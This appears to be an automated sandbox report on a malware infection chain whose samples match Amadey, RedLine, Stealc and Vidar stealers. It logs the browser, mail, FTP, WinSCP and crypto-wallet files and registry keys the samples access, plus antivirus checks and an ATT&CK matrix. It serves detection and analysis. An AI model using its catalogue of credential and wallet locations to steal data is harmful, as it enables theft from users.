Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00417420

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004172F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004174D0

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fpFm_@.
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Directory queried: C:\Users\user\Documents

Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob,	0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name,	0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings,	0_2_6C7E8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C8C0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E6410 bind,WSAGetLastError,	0_2_6C7E6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	112 Process Injection	3 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
